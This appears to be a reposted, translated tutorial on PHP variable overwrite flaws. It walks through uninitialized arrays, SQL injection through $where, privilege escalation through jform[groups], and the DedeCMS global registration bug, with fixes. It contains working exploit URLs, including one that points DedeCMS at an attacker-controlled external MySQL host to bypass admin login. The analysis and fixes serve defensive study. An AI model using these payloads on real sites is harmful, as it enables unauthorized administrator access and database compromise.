PHP variable overwrite

Source: Internet
Author: User

1. Uninitialized variable problem (1): http://www.bkjia.com/Article/201211/172403.html

    $updateinfo['Password'] = $newpassword;

The array is never initialized before elements are assigned to it like this. When hunting for vulnerabilities, search for keywords such as updateinfo and check whether the variable is initialized. If it is not, then with register_globals = On you can submit an array element such as updateinfo[amount] and modify your balance, points, member group, VIP status and other information stored in the member table at will.

Fix:

    $updateinfo = array();

Uninitialized variable problem (2): http://www.bkjia.com/Article/201208/150678.html

That article is about bypassing the program's defenses. The bypass is one cause of the injection, but the bigger factor is that the $where variable is never initialized:

    case 'LIST':
        $totalNum = $mysql->numTable("member", $where);

Because $where is not initialized, arbitrary SQL statements can be executed:

    http://localhost/stcms_html/member/u.php?action=list&where={SQL}

Fix: add $where = ''; before the class is called. When hunting for vulnerabilities, search for keywords such as where and check whether the variable is initialized.

Uninitialized variable problem (3): http://www.bkjia.com/Article/201205/130717.html

    // User registration data is fetched here: the jform array from POST is
    // taken as a whole, without specifying which fields are expected.
    $requestData = JRequest::getVar('jform', array(), 'post', 'array');
    $data = (array) $this->getData();
    // Traverse the registration data
    foreach ($temp as $k => $v) {
        $data[$k] = $v;
    }

This looks harmless, but a two-dimensional array can overwrite existing values: submit jform[groups][]=7 and the foreach overwrites the groups array, changing it to 7 (Administrator).

Fix: assign each field explicitly, as with $updateinfo['Password'] = $newpassword in link 1, or check whether the array is two-dimensional.

2. Variable overwrite caused by core code configuration problems

Dedecms: Example (1):

1. Understand PHP superglobal variables. The PHP superglobals are listed below. The feature to note is that each one is an array.

    $GLOBALS    array of all global variables
    $_SERVER    array of server environment variables
    $_GET       array of variables passed to the script through the GET method
    $_POST      array of variables passed to the script through the POST method
    $_COOKIE    array of cookie variables
    $_REQUEST   array of all user input, including the content of $_GET, $_POST and $_COOKIE
    $_FILES     array of variables related to file upload
    $_ENV       array of environment variables
    $_SESSION   array of session variables

2. Understand the $_GET variable. Write a PHP file to look at it:

    <?php
    var_dump($_GET);
    ?>

Access http://www.xxx.com/test.php?key=value to get:

    array(1) { ["key"]=> string(5) "value" }

As you can see, $_GET is an array, and we can use the GET method to pass in an array. Access http://www.xxx.com/test.php?key[arr1]=value to get:

    array(1) { ["key"]=> array(1) { ["arr1"]=> string(5) "value" } }

We passed in a nested array through the GET method, and this is where the problem starts. Many PHP security documents do not mention that nested arrays can be passed through GET; it only shows up occasionally in a few exploits.

3. A closer look at the DEDECMS global variable registration vulnerability. Now that we truly understand the $_GET variable, we can follow up on the real cause of the vulnerability and simulate the whole process.

Submit a nested array: http://www.xxxx.com/test.php?_POST[GLOBALS][pai_dbname]=X

    array(1) { ["_POST"]=> array(1) { ["GLOBALS"]=> array(1) { ["pai_dbname"]=> string(1) "X" } } }

When this data is passed into DEDECMS, it first goes through a first-layer filter: DEDECMS checks whether any key in $_REQUEST contains a global variable keyword. Our key is _POST and its value is an array, so the check is easily bypassed.

    foreach ($_REQUEST as $_k => $_v) {
        if (strlen($_k) > 0 && eregi('^(cfg_|GLOBALS)', $_k)) {
            exit('request var not allow!');
        }
    }

Then the real variable registration begins, and it processes the sources in order, starting with $_GET. Our key is _POST, so the first pass, over $_GET, registers the variable $_POST, and the second pass, over $_POST, registers the variable $GLOBALS!
    foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
        foreach ($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
    }

The cause of the vulnerability is now clear: the program registers $_POST through $_GET, and registers $GLOBALS through $_POST!

4. Fixing the vulnerability. Once the cause is understood, the fix follows.

1. Look at how DISCUZ does it: if the first character of the key is _, the variable is not registered.

    foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach ($$_request as $_key => $_value) {
            // Register the variable only if its name does not start with "_"
            $_key[0] != '_' && $$_key = daddslashes($_value);
        }
    }

2. DEDECMS can be fixed temporarily with the following method: while $_POST is being traversed to register variables, registration is blocked if the variable name matches GLOBALS.

    foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
        foreach ($$_request as $_k => $_v) {
            // Repeat the keyword check on every key of every source
            if (strlen($_k) > 0 && eregi('^(cfg_|GLOBALS)', $_k)) {
                exit('request var not allow!');
            }
            ${$_k} = _RunMagicQuotes($_v);
        }
    }

Example exp:

    http://www.xx.com/<DedeCMS admin directory>/login.php?dopost=login&validate=dcug&userid=Account&pwd=PASSWORD&_POST[GLOBALS][mongo_dbhost]=<external MySQL IP>&_POST[GLOBALS][mongo_dbuser]=<MySQL account>&_POST[GLOBALS][mongo_dbpwd]=<MySQL password>&_POST[GLOBALS][mongo_dbname]=<your own dedecms database>

Dedecms: Example (2): Bypassing the official patch (jizhu) http://www.bkjia.com/Article/201205/129974.html

Why is the $_COOKIE parameter not read from the superglobal $_REQUEST? Because request_order = "GP" is the default php.ini setting after PHP 5.3. If you change it to request_order = "GPC", $_REQUEST receives the cookie parameter as well. So if the PHP version is above 5.3, the variable overwrite vulnerability can be exploited again!

    CheckRequest($_REQUEST); // check whether the variables are valid

The check ignores the $_COOKIE parameters entirely.

More links:
https://forum.90sec.org/thread-2476-1-1.html
https://forum.90sec.org/thread-2468-1-1.html

3. Yaseng's PHP variable overwrite examples: Yaseng describes the issue in detail and presents various bypasses: http://www.bkjia.com/Article/201212/174595.html

Regarding Dedecms Example 2: some people say that &_POST[0xHEX][mongo_dbhost] (GLOBALS written in hexadecimal) can bypass the check this way. I tested it several times and failed. It may be a problem on my side, or the claim may be false.
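The DedeCMS registration loop from example (1) and the two fixes from step 4, run side by side on the nested-array request. This is an added model, not code from DedeCMS, Discuz or the linked articles: the function names, the explicit $scope array and the site_db value are assumptions made so that the result is the same on every PHP version.

```php
<?php
// Added example: a model, not DedeCMS or Discuz code. The scope is a plain array.

// The page's keyword check; preg_match stands in for eregi (removed in PHP 7).
function key_is_blocked(string $k): bool {
    return strlen($k) > 0 && preg_match('/^(cfg_|GLOBALS)/i', $k) === 1;
}

// Vulnerable flow: filter the top-level keys of $_REQUEST (modelled as GET + POST),
// then register every key of _GET, _POST, _COOKIE as a variable.
function register_vulnerable(array $scope): array {
    foreach (array_keys(array_merge($scope['_GET'], $scope['_POST'])) as $k) {
        if (key_is_blocked((string)$k)) {
            throw new RuntimeException('Request var not allow!');
        }
    }
    foreach (['_GET', '_POST', '_COOKIE'] as $src) {
        // Looked up by name on each pass, like $$_request, so an overwritten source is used.
        foreach ((array)$scope[$src] as $k => $v) {
            $scope[$k] = $v;                       // ${$_k} = $_v
        }
    }
    return $scope;
}

// Hardened flow: snapshot the sources first, then apply both fixes from the page
// to every key of every source (skip a leading "_", skip cfg_/GLOBALS names).
function register_hardened(array $scope): array {
    $sources = [$scope['_GET'], $scope['_POST'], $scope['_COOKIE']];
    foreach ($sources as $src) {
        foreach ($src as $k => $v) {
            $k = (string)$k;
            if ($k === '' || $k[0] === '_' || key_is_blocked($k)) {
                continue;
            }
            $scope[$k] = $v;
        }
    }
    return $scope;
}

// Constructed input for test.php?_POST[GLOBALS][pai_dbname]=X
$scope = [
    '_GET'    => ['_POST' => ['GLOBALS' => ['pai_dbname' => 'X']]],
    '_POST'   => [], '_COOKIE' => [],
    'GLOBALS' => ['pai_dbname' => 'site_db'],      // constructed "real" setting
];
printf("vulnerable: %s\n", register_vulnerable($scope)['GLOBALS']['pai_dbname']);
printf("hardened:   %s\n", register_hardened($scope)['GLOBALS']['pai_dbname']);
```

The hardened function skips rejected keys instead of calling exit() as the DedeCMS fix does; either choice keeps the attacker-supplied name out of the scope.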
